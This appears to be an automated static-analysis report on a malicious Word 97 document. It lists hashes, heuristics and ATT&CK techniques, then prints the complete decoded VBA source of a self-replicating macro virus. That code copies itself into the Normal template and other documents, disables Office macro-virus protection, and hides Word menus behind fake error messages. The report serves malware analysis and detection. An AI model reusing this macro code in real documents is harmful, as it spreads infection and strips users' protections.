Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 040569009831c2b6…

MALICIOUS

Office (OLE)

30.5 KB Created: 2001-09-04 10:17:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-19
MD5: 172b418af8b80b400e76141974eb3c20 SHA-1: feb1abb6a446e7e66d13482bf46b139331aa1763 SHA-256: 040569009831c2b63854fc87e380d70dbdf857a87ad6c29d5eeb0d6f82f53720
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample exhibits critical heuristic firings indicating VBA macro-virus replication and AV tampering. The AutoOpen macro attempts to copy itself and another macro ('ac') to the Normal template, and the AutoClose macro also attempts to copy macros and save the document. The script also attempts to disable virus protection and writes to a file path 'c:\doc.win', suggesting a dropper or downloader functionality. The ClamAV detection further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-7369994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7369994-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub Autoopen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2086 bytes
SHA-256: 90df29a0471108a34b80fa5f2a16315260b4818cd98aca372c11c757625f93ca
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ac"
Sub AutoClose()
On Error GoTo ab
Call cf
sr = "c:\doc.win"
imacrocount = WordBasic.countmacros(1, 0, 0)
For i = 1 To imacrocount
zu$ = WordBasic.macroname$(i, 1)
If zu$ = "ao" Then GoTo ab
Next i
Application.OrganizerCopy sr, ActiveDocument, Name:="ac", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy sr, ActiveDocument, Name:="ao", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
ab:
End Sub
Sub ToolsMacro()
MsgBox "Èçâèíèòå, íî íà ïèðàòñêîé âåðñèè ýòà ôóíêöèÿ íå ðàáîòàåò", vbCritical, "Îøèáêà"
End Sub
Sub ViewVBCode()
MsgBox "Îøèáêà â ñèñòåìíîì ðååñòðå Windows!", vbCritical, "Error"
End Sub
Sub toolsOptions()
MsgBox "Âàø êîìïüþòåð òåïåðü îáëàäàåò óäèâèòåëüíûì ñâîéñòâîì" + Chr$(13) + "-â í¸ì åñòü ÆÈÇÍÜ!"
End Sub
'Âîò îí ìîé ïåðâåíåö!
'Èìÿ åìó - 1313. Ïðîøó çàïîìíèòü!!!

Attribute VB_Name = "ao"
Sub Autoopen()
Attribute Autoopen.VB_Description = "Fuck"
Attribute Autoopen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.one"
On Error GoTo aT
im = WordBasic.countmacros(0, 0)
For i = 1 To im
If WordBasic.macroname$(i, 0, 0) = "ao" Then
    bI = -1
    End If
    Next i
    If Not bI Then
    sE$ = WordBasic.FileName$()
    mR$ = sE$ + ":ao"
    WordBasic.MacroCopy mR$, "Normal:ao", 1
   mR$ = sE$ + ":ac"
   WordBasic.MacroCopy mR$, "Normal:ac", 1
     End If
Call cf
aT:
With Options
    .VirusProtection = False
    .SaveNormalPrompt = False
  End With
End Sub
Sub cf()
On Error GoTo z
MF = Dir("c:\doc.win")
If MF = "doc.win" Then GoTo z
a = ActiveDocument.FullName
ActiveDocument.SaveAs "c:\doc.win"
ActiveDocument.SaveAs a
z:
End Sub